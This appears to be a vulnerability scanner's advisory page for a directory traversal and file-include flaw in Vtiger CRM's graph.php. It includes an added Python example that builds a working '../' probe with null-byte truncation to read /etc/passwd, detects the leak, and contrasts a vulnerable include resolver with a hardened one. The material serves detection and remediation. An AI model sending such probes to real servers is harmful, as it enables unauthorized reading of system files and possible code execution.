Vtiger CRM graph.php Directory Traversal

high Nessus Plugin ID 52656

Synopsis

An application running on the remote web server is affected by a directory traversal vulnerability.

Description

The version of Vtiger installed on the remote host is vulnerable to a directory traversal attack because it fails to properly sanitize user-supplied input to the 'module' parameter of the 'graph.php' script before using it to build a file path.
An unauthenticated attacker can exploit this flaw by sending '../' sequences in the 'module' parameter to read arbitrary files from the remote server, subject to the privileges of the affected web service. Because the parameter feeds a file include (the Elliot module listed below classifies the issue as an LFI), the same flaw can also lead to execution of PHP code contained in files the attacker is able to influence on the host.

Note that this version of Vtiger is also reportedly affected by several other vulnerabilities, which Nessus has not tested for.
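The following is an added example and is not code from the Nessus plugin or from the vtiger project. It shows, first, the kind of probe a CGI-abuse check sends against a 'module'-style parameter and how a leaked /etc/passwd is recognised in the response, and second, why the naive include pattern is exploitable while an allowlist plus a realpath containment check is not. The host URL, the 'graph_data.php' suffix appended to the module path, and the sample response bodies are all constructed for the example; the plugin's actual payload is not reproduced here.

```python
"""Added example, not code from the Nessus plugin or the vtiger project.

Shows (1) how a CGI-abuse check probes a 'module'-style parameter with a
traversal payload and recognises a leaked /etc/passwd in the response, and
(2) why the naive include pattern fails while an allowlist plus realpath
containment check does not. The host URL, the 'graph_data.php' suffix and the
sample bodies are all constructed for the example.
"""
import os
import re
from urllib.parse import quote

# A successfully read Unix password file contains the root entry.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE)

# Module names are plain identifiers; anything else is rejected up front.
MODULE_NAME_RE = re.compile(r"^[A-Za-z0-9_]+$")

# Constructed sample responses (not real vtiger output).
SAMPLE_VULNERABLE = (
    "<html><body>\n"
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "</body></html>"
)
SAMPLE_PATCHED = "<html><body>Warning: include(): failed to open stream</body></html>"


def build_probe(base_url, depth=12, target="/etc/passwd", null_byte=True):
    """Return the probe URL for graph.php's 'module' parameter.

    depth     : number of '../' segments; more than any plausible install
                depth is fine, since extra '..' at '/' are ignored.
    null_byte : append %00 so that a suffix the script concatenates after the
                parameter is truncated. Only effective on PHP < 5.3.4;
                later versions refuse paths containing NUL.
    """
    payload = "../" * depth + target.lstrip("/")
    if null_byte:
        payload += "\x00"
    return f"{base_url.rstrip('/')}/graph.php?module={quote(payload, safe='/')}"


def looks_like_passwd(body):
    """True when the response body carries a root passwd entry, i.e. the
    traversal reached the file system."""
    return PASSWD_RE.search(body) is not None


def naive_module_path(modules_root, module):
    """Vulnerable pattern (illustrative, not vtiger's code): the parameter is
    spliced into an include path unchecked. The NUL truncation that
    PHP < 5.3.4 applied is simulated so the appended suffix is lost, which is
    exactly what the %00 in the probe is for."""
    path = os.path.join(modules_root, module) + "/graph_data.php"  # hypothetical suffix
    path = path.split("\x00", 1)[0]
    return os.path.normpath(path)


def safe_module_path(modules_root, module):
    """Hardened resolver: allowlist the name, then prove the resolved path is
    still inside modules_root. Raises ValueError for anything else."""
    if "\x00" in module or not MODULE_NAME_RE.match(module):
        raise ValueError("invalid module name")
    root = os.path.realpath(modules_root)
    candidate = os.path.realpath(os.path.join(root, module, "graph_data.php"))
    # Defence in depth: even if the allowlist were loosened, the resolved
    # path must remain under the modules directory.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("module path escapes modules directory")
    return candidate


if __name__ == "__main__":
    url = build_probe("http://vtiger.example/vtigercrm")
    print("probe:", url)
    for label, body in (("vulnerable", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED)):
        print(f"{label}: passwd leaked = {looks_like_passwd(body)}")
    evil = "../" * 12 + "etc/passwd\x00"
    print("naive resolves to:", naive_module_path("/var/www/vtigercrm/modules", evil))
    for name in ("Leads", evil):
        try:
            print("safe accepts:", safe_module_path("/var/www/vtigercrm/modules", name))
        except ValueError as exc:
            print("safe rejects:", exc)
```

Two caveats when using a probe like this: the %00 truncation only works against PHP older than 5.3.4, so a host on a newer PHP may still be vulnerable to traversal without the null byte even though this exact probe fails, and a match on the root passwd entry is a signature, not proof of file inclusion, so confirm code execution separately before rating the finding as more than information disclosure.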

Solution

Upgrade to Vtiger CRM 5.1.0 or later.

See Also

http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt

Plugin Details

Severity: High

ID: 52656

File Name: vtiger_504_dir_traversal.nasl

Version: 1.12

Type: remote

Family: CGI abuses

Published: 3/14/2011

Updated: 4/11/2022

Configuration: Enable thorough checks

Supported Sensors: Nessus

Risk Information

VPR

Risk Factor: High

Score: 7.3

CVSS v2

Risk Factor: High

Base Score: 7.5

Temporal Score: 5.9

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Information

Required KB Items: www/PHP

Excluded KB Items: Settings/disable_cgi_scanning

Exploit Ease: No exploit is required

Exploited by Nessus: true

Patch Publication Date: 7/22/2009

Vulnerability Publication Date: 8/18/2009

Exploitable With

Elliot (vtiger CRM 5.0.4 LFI)

Reference Information

CVE: CVE-2009-3249

BID: 36062

CWE: 22

SECUNIA: 36309